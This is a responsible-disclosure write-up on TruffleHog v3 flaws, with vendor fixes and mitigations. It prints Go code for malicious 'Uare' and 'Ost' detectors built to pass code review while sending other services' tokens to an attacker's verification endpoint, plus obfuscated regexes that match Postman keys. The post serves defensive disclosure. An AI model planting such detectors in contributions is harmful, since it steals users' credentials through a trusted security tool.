Writeup: Exploiting TruffleHog v3 - Bending a Security Tool to Steal Secrets

6 March 2024

I started researching TruffleHog during a project for an enterprise client, where I worked in a security team responsible for implementing secret scanning of source code repositories. This blog post highlights several issues identified during that research. When combined, they make it possible to introduce a malicious detector which could harvest checked-in secrets for arbitrary services from anyone running TruffleHog v3.

These issues were reported to Truffle Security in December 2023, who acknowledged the report within hours. I would like to thank them for their transparent and productive collaboration during the responsible disclosure period.

Truffle Security have released their own blog post on the topic which can be found here: https://trufflesecurity.com/blog/contributor-spotlight-helena-rosenzweig-and-assetnote-team

What is TruffleHog?

Secrets should - as the name suggests - be kept secret, since they grant access to protected resources. They should therefore be stored in a secure location such as a key vault and not checked into source code repositories. Yet, it’s common for developers to unintentionally include secrets in their commits.

TruffleHog is an open source, automated security tool that scans code repositories and configuration files for active secrets, such as API keys and access tokens. Unlike many other secret scanners, TruffleHog also verifies whether identified secrets are valid or not. This surfaces active secrets to users so they can revoke them, without having to waste time on false positives.

TruffleHog has 13 thousand stars on GitHub and over 14 million downloads to date according to Truffle Security’s website. Truffle Security also provides an enterprise version of TruffleHog. In 2021 the company secured $14m in funding from venture capital investors to be able to work full time on TruffleHog.

Crowd sourced Detectors

TruffleHog supports the detection and verification of secrets for over 700 services as of the beginning of 2024. Each service has a matching detector, which is essentially a small Go program responsible for detecting and verifying potential matching secrets.

The core components of each detector are its keywords, regular expressions and verification endpoint. A keyword is a string that is likely to occur in the same context as the secret, such as a variable name. Most detectors have the name of their service as their keyword, such as “twilio” for the Twilio detector. The choice of keyword is very important: the scan only evaluates a chunk of bytes against a detector if one of that detector’s keywords occurs in the chunk. If there is a keyword match, the scan moves on to the next step of regex matching.

The regex represents the service’s secret pattern and is used to extract strings located near the keyword that match it. If a match has been detected, the string is sent to the verification endpoint provided in the detector. The verification endpoint belongs to the service and should return a status code 200 or 401 indicating whether the string is a valid secret or not.

Below is an example of the detector that detects GitHub tokens:

// Verification endpoint
func (Scanner) DefaultEndpoint() string { return "https://api.github.com" }

var (
  // Regular expression
  keyPat = regexp.MustCompile(`\b((?:ghp|gho|ghu|ghs|ghr|github_pat)_[a-zA-Z0-9_]{36,255})\b`)
)

// Keywords
func (s Scanner) Keywords() []string {
  return []string{"ghp_", "gho_", "ghu_", "ghs_", "ghr_", "github_pat_"}
}

...

// FromData will find and optionally verify GitHub secrets in a given set of bytes.
func (s Scanner) FromData(ctx context.Context, verify bool, data []byte) (results []detectors.Result, err error) {
  dataStr := string(data)
  matches := keyPat.FindAllStringSubmatch(dataStr, -1)

  for _, match := range matches {
    // First match is entire regex, second is the first group.
    if len(match) != 2 {
      continue
    }

    token := match[1]
    s1 := detectors.Result{
      DetectorType: detectorspb.DetectorType_Github,
      Raw:          []byte(token),
      ExtraData: map[string]string{
        "rotation_guide": "https://howtorotate.com/docs/tutorials/github/",
      },
    }

    if verify {
      client := common.SaneHttpClient()
      for _, url := range s.Endpoints(s.DefaultEndpoint()) {
        req, err := http.NewRequestWithContext(ctx, "GET", fmt.Sprintf("%s/user", url), nil)
        if err != nil {
          continue
        }
        req.Header.Add("Content-Type", "application/json; charset=utf-8")
        req.Header.Add("Authorization", fmt.Sprintf("token %s", token))
        res, err := client.Do(req)
        if err == nil {
          if res.StatusCode >= 200 && res.StatusCode < 300 {
            var userResponse userRes
            err = json.NewDecoder(res.Body).Decode(&userResponse)
            res.Body.Close()
            if err == nil {
              s1.Verified = true
              s1.ExtraData["username"] = userResponse.Login
              s1.ExtraData["url"] = userResponse.UserURL
              s1.ExtraData["account_type"] = userResponse.Type
              s1.ExtraData["site_admin"] = fmt.Sprintf("%t", userResponse.SiteAdmin)
              s1.ExtraData["name"] = userResponse.Name
              s1.ExtraData["company"] = userResponse.Company
            }
          }
        }
      }
    }

    if !s1.Verified && detectors.IsKnownFalsePositive(string(s1.Raw), detectors.DefaultFalsePositives, true) {
      continue
    }
    results = append(results, s1)
  }
  return
}

Whenever one of the strings in the keywords array [“ghp_”, “gho_”, “ghu_”, ...] is found in a source file, any subsequent string matching the regex “\b((?:ghp|gho|ghu|ghs|ghr|github_pat)_[a-zA-Z0-9_]{36,255})\b” will be sent to the verification endpoint “https://api.github.com/user”.
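The two-stage flow described above (keyword pre-filter first, regex second) can be sketched in a few lines of Go. This is a simplified illustration and not TruffleHog’s actual engine: the detector struct and the candidates function are hypothetical names, and the case-insensitive keyword comparison is an assumption made for the sketch. Only the keywords and the regex are taken from the GitHub detector above.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// detector is a simplified, hypothetical stand-in for a TruffleHog detector.
type detector struct {
	keywords []string
	pattern  *regexp.Regexp
}

// githubDetector reuses the keywords and regex quoted from the GitHub detector.
func githubDetector() detector {
	return detector{
		keywords: []string{"ghp_", "gho_", "ghu_", "ghs_", "ghr_", "github_pat_"},
		pattern:  regexp.MustCompile(`\b((?:ghp|gho|ghu|ghs|ghr|github_pat)_[a-zA-Z0-9_]{36,255})\b`),
	}
}

// candidates runs the regex only if at least one keyword occurs in the chunk.
// The case-insensitive comparison is an assumption of this sketch.
func candidates(d detector, chunk string) []string {
	lower := strings.ToLower(chunk)
	hit := false
	for _, kw := range d.keywords {
		if strings.Contains(lower, strings.ToLower(kw)) {
			hit = true
			break
		}
	}
	if !hit {
		return nil // keyword pre-filter failed, the regex is never evaluated
	}
	var out []string
	for _, m := range d.pattern.FindAllStringSubmatch(chunk, -1) {
		out = append(out, m[1]) // m[1] is the first capturing group
	}
	return out
}

func main() {
	d := githubDetector()
	chunk := "token = ghp_" + strings.Repeat("A", 36) // synthetic, not a real token
	fmt.Println(len(candidates(d, chunk)))
	fmt.Println(len(candidates(d, "nothing to see here")))
}
```

Every string returned by candidates is what a detector would go on to send to its verification endpoint when verification is enabled.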

TruffleHog provides a function called PrefixRegex, which takes the keywords as its input argument and embeds them into a regular expression. This regular expression, when prepended to the regex of the detector, enforces that the secret starts at most 40 characters after the keyword, which reduces the number of false positives.

// PrefixRegex ensures that at least one of the given keywords is within
// 20 characters of the capturing group that follows.
// This can help prevent false positives.
func PrefixRegex(keywords []string) string {
  pre := `(?i)(?:`
  middle := strings.Join(keywords, "|")
  post := `)(?:.|[\n\r]){0,40}`
  return pre + middle + post
}
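To make the 40-character window concrete, here is a small sketch that pairs a local copy of the helper with the Coinbase token pattern `\b([a-zA-Z-0-9]{64})\b`. The names prefixRegex, findSecret and sample are introduced for this illustration only, and the token is synthetic.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// prefixRegex is a local copy of the PrefixRegex helper quoted above.
func prefixRegex(keywords []string) string {
	return `(?i)(?:` + strings.Join(keywords, "|") + `)(?:.|[\n\r]){0,40}`
}

var coinbasePat = regexp.MustCompile(prefixRegex([]string{"coinbase"}) + `\b([a-zA-Z-0-9]{64})\b`)

// findSecret returns the captured token, or "" if no token starts within
// 40 characters after the keyword.
func findSecret(text string) string {
	m := coinbasePat.FindStringSubmatch(text)
	if m == nil {
		return ""
	}
	return m[1]
}

// sample places gap spaces between the keyword and a synthetic 64-character token.
func sample(gap int) string {
	return "coinbase" + strings.Repeat(" ", gap) + strings.Repeat("A", 64)
}

func main() {
	for _, gap := range []int{10, 40, 41, 50} {
		fmt.Printf("gap=%d matched=%t\n", gap, findSecret(sample(gap)) != "")
	}
}
```

With these inputs the token is found for gaps of 10 and 40 characters and missed for gaps of 41 and 50, which is the cut-off implied by the `{0,40}` quantifier.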

PrefixRegex is especially useful for detectors whose regex pattern is generic because the service’s tokens lack a distinctive prefix of the kind GitHub tokens have. As seen in the Coinbase detector below, the generic structure of Coinbase tokens (64 case-insensitive alphanumeric characters) requires a PrefixRegex call to reduce the number of false positives.

var (
  // Make sure that your group is surrounded in boundary characters
  // such as below to reduce false positives.
  keyPat = regexp.MustCompile(detectors.PrefixRegex([]string{"coinbase"}) + `\b([a-zA-Z-0-9]{64})\b`)
)

// Keywords are used for efficiently pre-filtering chunks.
// Use identifiers in the secret preferably, or the provider name.
func (s Scanner) Keywords() []string {
  return []string{"coinbase"}
}

Most detectors contain a PrefixRegex call in the generation of their regex. If a detector has a generic regex but no PrefixRegex call, any string matching against the regex will be sent to the verification endpoint.

The creation of new detectors is crowdsourced, meaning that anyone is welcome to implement a detector and create a pull request for it. All contributions go through an audit by a Truffle Security employee. Once a detector has been reviewed and accepted, it is added to the tool. TruffleHog hosted a competition for adding new detectors as recently as October 2023.

Primary issues

TruffleHog enables all detectors by default. This means that any secrets checked into your source code can potentially be sent to any of the 700+ service providers supported, which you may not even be using. This becomes especially concerning given the following issues:

Issue #1: Overlapping keywords

If a keyword of a detector exists in a data chunk, TruffleHog will apply the detector’s regex to that chunk. If the keyword is a substring of another detector’s keywords, the data chunk will be evaluated against both regular expressions. If there is a match against both regular expressions, the secret will be sent to both verification endpoints.

The probability of a secret matching against multiple regex patterns is quite high since many secrets share common patterns, such as alphanumerical strings of a given length. There are for example 24 detectors that have the regex pattern ([a-zA-Z0-9]{32}), and many more that are supersets matching both this pattern and others.
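A keyword overlap of this kind is easy to test for mechanically. The sketch below flags every case where a keyword of one detector is a substring of a keyword of another. It is a hypothetical review aid, not part of TruffleHog, and the detector names and keywords ("pay", "examplepay", "acme") are made up for illustration.

```go
package main

import (
	"fmt"
	"sort"
	"strings"
)

// overlaps returns "short/long" entries for every keyword of one detector
// that is a substring of a keyword belonging to a different detector.
// The comparison is case-insensitive (an assumption of this sketch).
func overlaps(keywords map[string][]string) []string {
	var out []string
	for a, kwsA := range keywords {
		for b, kwsB := range keywords {
			if a == b {
				continue
			}
			for _, ka := range kwsA {
				for _, kb := range kwsB {
					if strings.Contains(strings.ToLower(kb), strings.ToLower(ka)) {
						out = append(out, ka+"/"+kb)
					}
				}
			}
		}
	}
	sort.Strings(out) // map iteration order is random, so sort for stable output
	return out
}

// sampleDetectors maps hypothetical detector names to their keywords.
func sampleDetectors() map[string][]string {
	return map[string][]string{
		"ExamplePay": {"examplepay"},
		"Pay":        {"pay"},
		"Acme":       {"acme"},
	}
}

func main() {
	fmt.Println(overlaps(sampleDetectors()))
}
```

Any chunk containing "examplepay" also contains "pay", so both hypothetical detectors would have their regexes applied to it.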

Issue #2: Secrets can be sent to multiple detectors’ verification endpoints

If the same secret matches multiple detectors, TruffleHog will send it to the verification endpoints of all matching detectors. It’s highly unlikely that the same secret is valid for multiple services, so whenever a secret matches multiple detectors it is leaked to third parties (i.e. services other than the one the secret is valid for). This may seem harmless, as leaked secrets should be rotated immediately, but a malicious actor in control of a verification service may attempt to use a token intended for another detector’s service before the owner has had the chance to rotate it.

Implementing a malicious detector: “Uare”

An attacker sets up a fictional SaaS company called “Uare”, with the intent of stealing secrets from the existing detector for Square. As “uare” is a substring of “square”, it is very likely to match against any occurrences of Square secrets in users’ source files. The attacker can construct a malicious detector for the Uare service, which could pass as being legitimate and benign in a review. Of course, this attack requires the malicious detector to masquerade as a legitimate contribution during the review process.

The real Square detector looks for the keyword “EAAA” and matches against the following regex:

// Square detector
var (
  // more context to be added if this is too generic
  secretPat = regexp.MustCompile(
               detectors.PrefixRegex([]string{"square"}) +
               `(EAAA[a-zA-Z0-9\-\+\=]{60})`
              )
)

// Keywords are used for efficiently pre-filtering chunks.
// Use identifiers in the secret preferably, or the provider name.
func (s Scanner) Keywords() []string {
  return []string{"EAAA"}
}

The attacker’s malicious Uare detector could look like the example below. The keyword and regex pattern would match secrets following Square’s token format, without this being obvious at first glance. The explicit requirement of an “EAAA” prefix has been removed, and instead, a more general regex pattern has been constructed which is a superset of the Square detector’s regex. A localhost verification endpoint is used for demonstration purposes. In a real attack scenario, the attacker would instead set up a site for the Uare service at a suitable domain, which would provide a verification endpoint to be included in the detector.

// Uare detector
var (
  secretPat = regexp.MustCompile(detectors.PrefixRegex([]string{"uare"}) + `([a-zA-Z0-9\-\+\=]{64})`)
)

func (s Scanner) Keywords() []string {
  return []string{"uare"}
}

...

if verify {
  baseURL := "http://localhost:8006"

  client := common.SaneHttpClient()

  req, err := http.NewRequestWithContext(ctx, "POST", baseURL, nil)
  if err != nil {
    continue
  }
  // resMatch is the captured secret from the elided matching loop
  // (variable name assumed, the loop is not shown in this excerpt).
  req.Header.Add("Authorization", fmt.Sprintf("Bearer %s", resMatch))
  req.Header.Add("Content-Type", "application/json")
  res, err := client.Do(req)
  if err == nil {
    res.Body.Close() // The response body is unused.

    if res.StatusCode == http.StatusOK || res.StatusCode == http.StatusForbidden {
      // s1 is the detectors.Result built for this match, as in the GitHub detector.
      s1.Verified = true
    }
  }
}

When running the scan against the following file:

We can see that TruffleHog identifies the secret as being potentially valid for both Square and Uare, and thus sends the secret to both verification endpoints. In this scenario it is not a valid Square token and the malicious endpoint always returns true. In a real attack scenario, the attacker would rather return status code 401, to stay undetected.

Unverified results will not be shown for users running TruffleHog with the --only-verified flag, which is common for enterprise usage as part of CI pipelines.

Every time a TruffleHog user scans a repository containing a Square token, the token will be shared with the attacker through the Uare detector’s verification endpoint. In cases where the token is valid, the attacker could use it to impersonate the victim and perform arbitrary actions against the Square API (until the secret has been rotated or revoked).
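The overlap between the two detectors can be reproduced outside TruffleHog with nothing but the two regular expressions. The sketch below uses a local copy of PrefixRegex and a synthetic string in Square’s token format ("EAAA" followed by 60 characters). The helper names and the sample config line are assumptions made for illustration.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// prefixRegex is a local copy of TruffleHog's PrefixRegex helper.
func prefixRegex(keywords []string) string {
	return `(?i)(?:` + strings.Join(keywords, "|") + `)(?:.|[\n\r]){0,40}`
}

var (
	// Pattern of the real Square detector, as quoted above.
	squarePat = regexp.MustCompile(prefixRegex([]string{"square"}) + `(EAAA[a-zA-Z0-9\-\+\=]{60})`)
	// Pattern of the malicious Uare detector, as quoted above.
	uarePat = regexp.MustCompile(prefixRegex([]string{"uare"}) + `([a-zA-Z0-9\-\+\=]{64})`)
)

// capture returns the first capturing group of the first match, or "".
func capture(p *regexp.Regexp, text string) string {
	m := p.FindStringSubmatch(text)
	if m == nil {
		return ""
	}
	return m[1]
}

// sampleLine builds a hypothetical config line holding a synthetic token.
func sampleLine() (line, token string) {
	token = "EAAA" + strings.Repeat("x", 60)
	return "square_access_token = " + token, token
}

func main() {
	line, token := sampleLine()
	fmt.Println("square captures token:", capture(squarePat, line) == token)
	fmt.Println("uare captures token:  ", capture(uarePat, line) == token)
}
```

Both patterns capture the same 64-character string, because "uare" occurs inside "square" and the Uare character class accepts everything the Square pattern does.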

This attack leverages issue #1, exploiting overlapping keywords and regular expressions in different detectors. Implementing controls to prevent overlapping detectors would mitigate this attack. However, issue #2 would persist, illustrated in the following example:

Implementing a malicious detector: “Ost”

Several detectors do not have the name of their service included amongst their keywords. An example of this is the Postman detector, which only has the string “pmak” as its keyword. An attacker could create a detector whose keyword is a substring of “postman”, such as “ost” (a detector using the full string “postman” would of course get caught in the review process). The string “pmak” will always be present in a Postman API key, but it is not unlikely that the string “postman” will also occur in its context, such as in the following example:

A detector for the fictional SaaS service “Ost” with the keyword “ost” would match against this Postman API key, and any other key following the same format. The attacker could set the regex pattern to something discreet such as the following:

// Ost detector
var (
  keyPat = regexp.MustCompile(detectors.PrefixRegex([]string{"ost"}) + `\b([a-zA-Z-0-9]{59})\b`)
)

func (s Scanner) Keywords() []string {
  return []string{"ost"}
}

In the example above, the attacker has omitted the “PMAK-” prefix, which is present in the Postman detector’s regex:

// Postman detector
var (
  keyPat = regexp.MustCompile(`\b(PMAK-[a-zA-Z-0-9]{59})\b`)
)

By omitting the “PMAK-” prefix, the attacker has constructed a generic regex which shows no sign of matching Postman secrets. The attacker behind the “Ost” detector can now prepend “PMAK-” to any secret received at its verification endpoint, knowing that it will likely be a Postman API key.

Other detectors that are currently vulnerable to this type of attack (i.e. do not have the name of their service as a keyword) are the detectors for Stripe, OpenAI, Dropbox, Mailchimp, RabbitMQ, Shopify and Slack, to name a few.

In this example, the “Ost” detector has a basic regex for demonstration purposes. There are however countless ways an attacker could obfuscate a regular expression beyond recognition. Below are a few examples of regular expressions that, despite their different appearances, all match against Postman API keys:

keyPat1 = regexp.MustCompile(`\b([a-zA-Z-0-9]{64})\b`)
keyPat2 = regexp.MustCompile(`\b([a-zA-Z]{4}-[a-zA-Z-0-9]{59})\b`)
keyPat3 = regexp.MustCompile(`\b([A-Z]{4}[a-zA-Z-0-9]{60})\b`)
keyPat4 = regexp.MustCompile(`\b([a-zA-Z_.-]{4}-[a-zA-Z-0-9]{58,60})\b`)
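The claim can be checked with a short program that runs each of the four patterns against a string in the format accepted by the Postman detector’s regex ("PMAK-" followed by 59 characters). The key below is synthetic, and the helper names and the surrounding config line are assumptions of this sketch.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// The four obfuscated patterns listed above.
var obfuscated = []*regexp.Regexp{
	regexp.MustCompile(`\b([a-zA-Z-0-9]{64})\b`),
	regexp.MustCompile(`\b([a-zA-Z]{4}-[a-zA-Z-0-9]{59})\b`),
	regexp.MustCompile(`\b([A-Z]{4}[a-zA-Z-0-9]{60})\b`),
	regexp.MustCompile(`\b([a-zA-Z_.-]{4}-[a-zA-Z-0-9]{58,60})\b`),
}

// sampleKey builds a synthetic 64-character key: "PMAK-" + 24 chars + "-" + 34 chars.
func sampleKey() string {
	return "PMAK-" + strings.Repeat("0a", 12) + "-" + strings.Repeat("1b", 17)
}

// matchesAll reports whether every obfuscated pattern captures the whole key
// when it appears in a hypothetical config line.
func matchesAll(key string) bool {
	line := "postman_api_key = " + key
	for _, p := range obfuscated {
		m := p.FindStringSubmatch(line)
		if m == nil || m[1] != key {
			return false
		}
	}
	return true
}

func main() {
	key := sampleKey()
	fmt.Println(len(key), matchesAll(key))
}
```

None of the four patterns mentions "PMAK", yet each of them captures the full key.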

Additional Issues

In addition to these primary issues, the following issues were also reported. They may increase the risk of detectors breaking out of context and matching against other detectors’ secrets:

Issue #3: Missing PrefixRegex calls

Some detectors do not make use of the PrefixRegex function whereas others do. The absence of it makes it possible for a detector to reach and match against secrets located far beyond its context. An example of such a detector is The Guardian detector, which is both generic in its regex pattern and lacks a PrefixRegex call, allowing it to match against other detectors’ secrets. When running a TruffleHog scan on the following file:

TruffleHog will match the Coinmarketcap secret to The Guardian detector (and ultimately send the secret to The Guardian’s endpoint):

Issue #4: Greedy regex pattern matching

The regex matching uses greedy quantifiers and will select the string matching its pattern located furthest away within its search range (which for most detectors is 40 characters). This makes it possible for a detector to match against other surrounding secrets. Below is an example demonstrating this issue using the Glassnode and Miro detectors, as they have different keywords but share the same regex \b([0-9A-Za-z]{27})\b. When running a TruffleHog scan on the following file:

TruffleHog will match the Miro secret (ending with “500”) with the Glassnode detector, even though there is a Glassnode secret located within closer reach (the string ending with “512”):

This can not only lead to false negatives, but also to secrets being sent to third parties’ endpoints.
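The effect of the greedy quantifier can be reproduced with Go’s regexp package alone. The sketch below builds the prefix once with the greedy `{0,40}` and once with a lazy `{0,40}?`, and applies both to two synthetic 27-character tokens. The lazy variant is only an illustrative contrast and is not claimed to be TruffleHog’s exact code. The helper names and the sample text are assumptions.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// tokenPat is the regex shared by the Glassnode and Miro detectors.
const tokenPat = `\b([0-9A-Za-z]{27})\b`

// prefix mirrors PrefixRegex for a single keyword; lazy switches the
// quantifier from {0,40} to {0,40}? (illustrative variant).
func prefix(keyword string, lazy bool) string {
	q := `{0,40}`
	if lazy {
		q += `?`
	}
	return `(?i)(?:` + regexp.QuoteMeta(keyword) + `)(?:.|[\n\r])` + q
}

// firstCapture returns the token captured for the keyword, or "".
func firstCapture(keyword string, lazy bool, text string) string {
	m := regexp.MustCompile(prefix(keyword, lazy) + tokenPat).FindStringSubmatch(text)
	if m == nil {
		return ""
	}
	return m[1]
}

// sample returns a two-line text plus the near (ends in 512) and far
// (ends in 500) synthetic tokens it contains.
func sample() (text, near, far string) {
	near = strings.Repeat("a", 24) + "512"
	far = strings.Repeat("b", 24) + "500"
	return "glassnode=" + near + "\nmiro=" + far, near, far
}

func main() {
	text, near, far := sample()
	fmt.Println("greedy picks far token:", firstCapture("glassnode", false, text) == far)
	fmt.Println("lazy picks near token: ", firstCapture("glassnode", true, text) == near)
}
```

Both tokens start within 40 characters of the "glassnode" keyword, so the greedy prefix consumes as much as it can and lands on the token next to "miro", while the lazy prefix stops at the nearest one.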

Issue #5: Generic keywords

Several detectors have generic keywords, such as “float”, “user”, “wit”, “tru”, “getemail”, “getemails” and “getresponse”, which are likely to exist in many users’ file systems and repositories. Some detectors make up for their generic keyword by having a more specific regex pattern, but not all of them do. This is not an issue in and of itself, but can lead to unintentional exposure of secrets, especially when combined with issues 3 and 4.

Recommendations

The issues presented are not believed to be well-known by users of TruffleHog and may put their secrets at risk during ordinary usage of the tool. TruffleHog already contains opt-in mitigations for some of these, such as the --include-detectors flag which allows users to provide an explicit allow list of detectors to use when performing a scan.

By limiting usage to a subset of detectors for services which are known to be in use by the scanned repository, the likelihood of being exploited by malicious or wide-reaching detectors is reduced.

Other mitigations that might be worthwhile for Truffle Security to consider are:

Improvements

During the responsible disclosure period, Truffle Security made the following improvements to TruffleHog to address the issues covered in this blog post:

  1. TruffleHog no longer attempts verification of the same secret if it is detected by two or more different detectors in a single chunk of data as of v3.67.0. This can be overridden by the --allow-verification-overlap flag.

  2. An improvement to how nearby keywords affect matching of secrets, by using a lazy quantifier in the PrefixRegex function as of v3.67.7.

  3. Several detectors that were not providing much value and were firing often have been removed.

  4. Additional checks and training have been added to the code review process to look for this type of malicious contribution specifically, on top of the existing checks.
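The idea behind the first improvement can be sketched as follows. This is not TruffleHog’s implementation: the detection type, the verifiable function and the exact-equality comparison of secrets are all assumptions made to illustrate the behaviour described in item 1, with allowOverlap standing in for the override flag.

```go
package main

import "fmt"

// detection pairs a detector name with the secret it captured in one chunk
// (hypothetical type for this sketch).
type detection struct {
	detector string
	secret   string
}

// verifiable returns the detections that would still be sent for verification:
// those whose secret was captured by exactly one detector in the chunk.
// With allowOverlap set, nothing is filtered.
func verifiable(found []detection, allowOverlap bool) []detection {
	if allowOverlap {
		return found
	}
	detectorsBySecret := map[string]map[string]bool{}
	for _, d := range found {
		if detectorsBySecret[d.secret] == nil {
			detectorsBySecret[d.secret] = map[string]bool{}
		}
		detectorsBySecret[d.secret][d.detector] = true
	}
	var out []detection
	for _, d := range found {
		if len(detectorsBySecret[d.secret]) == 1 {
			out = append(out, d)
		}
	}
	return out
}

func main() {
	found := []detection{
		{"Square", "tokenA"},
		{"Uare", "tokenA"}, // same secret, different detector
		{"Github", "tokenB"},
	}
	fmt.Println(len(verifiable(found, false)), len(verifiable(found, true)))
}
```

In this model the secret shared by the Square and Uare detectors is never sent to either endpoint unless the user explicitly opts in, which is what removes the incentive for the attacks described earlier.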

These changes are a clear improvement to TruffleHog. There are several approaches that could have been taken to address the raised issues. It is therefore reassuring that Truffle Security chose to implement a solution that is enabled by default, providing an extra guard rail for its users.

To any user that wants to further harden their TruffleHog installation, I recommend whitelisting detectors by setting the --include-detectors flag. Doing so limits the attack surface that users expose themselves to. An attacker that wants to harvest secrets from other services is not limited to the services that TruffleHog already supports. The --include-detectors flag therefore lets users explicitly state which detectors they trust.

Lastly, I would like to thank Truffle Security for being so quick and responsive during the responsible disclosure period. It has been a pleasure working with them.

Timeline


Helena Rosenzweig

Security Researcher

